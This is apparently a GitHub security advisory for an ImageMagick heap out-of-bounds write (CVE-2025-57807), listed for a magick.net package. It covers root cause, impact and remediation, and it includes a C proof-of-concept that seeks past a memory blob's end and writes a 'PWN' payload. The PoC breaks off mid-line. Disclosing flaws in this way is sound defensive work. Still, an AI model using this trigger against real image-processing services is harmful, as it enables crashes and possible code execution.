logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-57807 magick.net-q16-openmp-x64

Package

Manager: nuget
Name: magick.net-q16-openmp-x64
Vulnerable Version: >=0 <14.8.2

Severity

Level: Low

CVSS v3.1: CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L

CVSS v4.0: CVSS:4.0/AV:L/AC:H/AT:N/PR:H/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

EPSS: 0.00012 pctl0.01122

Details

ImageMagick BlobStream Forward-Seek Under-Allocation **Reporter:** Lumina Mescuwa **Product:** ImageMagick 7 (MagickCore) **Component:** `MagickCore/blob.c` (Blob I/O - BlobStream) **Tested:** 7.1.2-0 (source tag) and 7.1.2-1 (Homebrew), macOS arm64, clang-17, Q16-HDRI **Impact:** Heap out-of-bounds **WRITE** (attacker-controlled bytes at attacker-chosen offset) → memory corruption; potential code execution --- ## Executive Summary For memory-backed blobs (**BlobStream**), [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) permits advancing the stream **offset** beyond the current end without increasing capacity. The subsequent [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) then expands by **`quantum + length`** (amortized) instead of **`offset + length`**, and copies to `data + offset`. When `offset ≫ extent`, the copy targets memory beyond the allocation, producing a deterministic heap write on 64-bit builds. No 2⁶⁴ arithmetic wrap, external delegates, or policy settings are required. --- ## Affected Scope - **Versions confirmed:** 7.1.2-0, 7.1.2-1 - **Architectures:** Observed on macOS arm64; architecture-agnostic on LP64 - Paths: MagickCore blob subsystem — **BlobStream** ([`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) and [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938)). - **Not required:** External delegates; special policies; integer wraparound --- ## Technical Root Cause **Types (LP64):** `offset: MagickOffsetType` (signed 64-bit) `extent/length/quantum: size_t` (unsigned 64-bit) `data: unsigned char*` **Contract mismatch:** - [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) (BlobStream) updates `offset` to arbitrary positions, including past end, **without** capacity adjustment. - [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) tests `offset + length >= extent` and grows **by** `length + quantum`, doubles `quantum`, reallocates to `extent + 1`, then: ``` q = data + (size_t)offset; memmove(q, src, length); ``` There is **no guarantee** that `extent ≥ offset + length` post-growth. With `offset ≫ extent`, `q` is beyond the allocation. **Wrap-free demonstration:** Initialize `extent=1`, write one byte (`offset=1`), seek to `0x10000000` (256 MiB), then write 3–4 bytes. Growth remains << `offset + length`; the copy overruns the heap buffer. --- ## Exploitability & Reachability - **Primitive:** Controlled bytes written at a controlled displacement from the buffer base. - **Reachability:** Any encode-to-memory flow that forward-seeks prior to writing (e.g., header back-patching, reserved-space strategies). Even if current encoders/writers avoid this, the API contract **permits** it, thus creating a latent sink for first- or third-party encoders/writers. - **Determinism:** Once a forward seek past end occurs, the first subsequent write reliably corrupts memory. --- ## Impact Assessment - **Integrity:** High - adjacent object/metadata overwrite plausible. - **Availability:** High - reliably crashable (ASan and non-ASan). - **Confidentiality:** High - Successful exploitation to RCE allows the attacker to read all data accessible by the compromised process. - **RCE plausibility:** Typical of heap OOB writes in long-lived image services; allocator/layout dependent. --- ## CVSS v3.1 Rationale (9.8) - **AV:N / PR:N / UI:N** - server-side image processing is commonly network-reachable without auth or user action. - **AC:L** - a single forward seek + write suffices; no races or specialized state. - **S:U** - corruption localized to the ImageMagick process. - **C:H / I:H / A:H** - A successful exploit leads to RCE, granting full control over the process. This results in a total loss of Confidentiality (reading sensitive data), Integrity (modifying files/data), and Availability (terminating the service). _Base scoring assumes successful exploitation; environmental mitigations are out of scope of Base metrics._ --- ## Violated Invariant > **Before copying `length` bytes at `offset`, enforce `extent ≥ offset + length` with overflow-checked arithmetic.** The BlobStream growth policy preserves amortized efficiency but fails to enforce this **per-write** safety invariant. --- ## Remediation (Principle) In [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) (BlobStream case): 1. **Checked requirement:** `need = (size_t)offset + length;` → if `need < (size_t)offset`, overflow → fail. 2. **Ensure capacity ≥ need:** `target = MagickMax(extent + quantum + length, need);` (Optionally loop, doubling `quantum`, until `extent ≥ need` to preserve amortization.) 3. **Reallocate to `target + 1` before copying;** then perform the move. **Companion hardening (recommended):** - Document or restrict [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) on BlobStream so forward seeks either trigger explicit growth/zero-fill or require the subsequent write to meet the invariant. - Centralize blob arithmetic in checked helpers. - Unit tests: forward-seek-then-write (success and overflow-reject). --- ## Regression & Compatibility - **Behavior change:** Forward-seeked writes will either allocate to required size or fail cleanly (overflow/alloc-fail). - **Memory profile:** Single writes after very large seeks may allocate large buffers; callers requiring sparse behavior should use file-backed streams. --- ## Vendor Verification Checklist - Reproduce with a minimal in-memory BlobStream harness under ASan. - Apply fix; verify `extent ≥ offset + length` at all write sites. - Add forward-seek test cases (positive/negative). - Audit other growth sites (`SetBlobExtent`, stream helpers). - Clarify BlobStream seek semantics in documentation. - Unit test: forward seek to large offset on **BlobStream** followed by 1–8 byte writes; assert either growth to `need` or clean failure. --- # PoC / Reproduction / Notes ## Environment - **OS/Arch:** macOS 14 (arm64) - **Compiler:** clang-17 with AddressSanitizer - **ImageMagick:** Q16-HDRI - **Prefix:** `~/opt/im-7.1.2-0` - **`pkg-config`:** from PATH (no hard-coded `/usr/local/...`) --- ## Build ImageMagick 7.1.2-0 (static, minimal) ```bash ./configure --prefix="$HOME/opt/im-7.1.2-0" --enable-hdri --with-quantum-depth=16 \ --disable-shared --enable-static --without-modules \ --without-magick-plus-plus --disable-openmp --without-perl \ --without-x --without-lqr --without-gslib make -j"$(sysctl -n hw.ncpu)" make install "$HOME/opt/im-7.1.2-0/bin/magick" -version > magick_version.txt ``` --- ## Build & Run the PoC (memory-backed BlobStream) **`poc.c`:** _Uses private headers (`blob-private.h`) to exercise blob internals; a public-API variant (custom streams) is feasible but unnecessary for triage._ ```c // poc.c #include <stdio.h> #include <stdlib.h> #include <MagickCore/MagickCore.h> #include <MagickCore/blob.h> #include "MagickCore/blob-private.h" int main(int argc, char **argv) { MagickCoreGenesis(argv[0], MagickTrue); ExceptionInfo *e = AcquireExceptionInfo(); ImageInfo *ii = AcquireImageInfo(); Image *im = AcquireImage(ii, e); if (!im) return 1; // 1-byte memory blob → BlobStream unsigned char *buf = (unsigned char*) malloc(1); buf[0] = 0x41; AttachBlob(im->blob, buf, 1); // type=BlobStream, extent=1, offset=0 SetBlobExempt(im, MagickTrue); // don't free our malloc'd buf // Step 1: write 1 byte (creates BlobInfo + sets offset=1) unsigned char A = 0x42; (void) WriteBlob(im, 1, &A); fprintf(stderr, "[+] after 1 byte: off=%lld len=%zu\n", (long long) TellBlob(im), (size_t) GetBlobSize(im)); // Step 2: seek way past end without growing capacity const MagickOffsetType big = (MagickOffsetType) 0x10000000; // 256 MiB (void) SeekBlob(im, big, SEEK_SET); fprintf(stderr, "[+] after seek: off=%lld len=%zu\n", (long long) TellBlob(im), (size_t) GetBlobSize(im)); // Step 3: small write → reallocation grows by quantum+length, not to offset+length // memcpy then writes to data + offset (OOB) const unsigned char payload[] = "PWN"; (void)

Metadata

Created: 2025-09-05T20:09:19Z
Modified: 2025-09-05T20:09:19Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-23hg-53q6-hqfg/GHSA-23hg-53q6-hqfg.json
CWE IDs: ["CWE-122", "CWE-131", "CWE-787"]
Alternative ID: GHSA-23hg-53q6-hqfg
Finding: F316
Auto approve: 1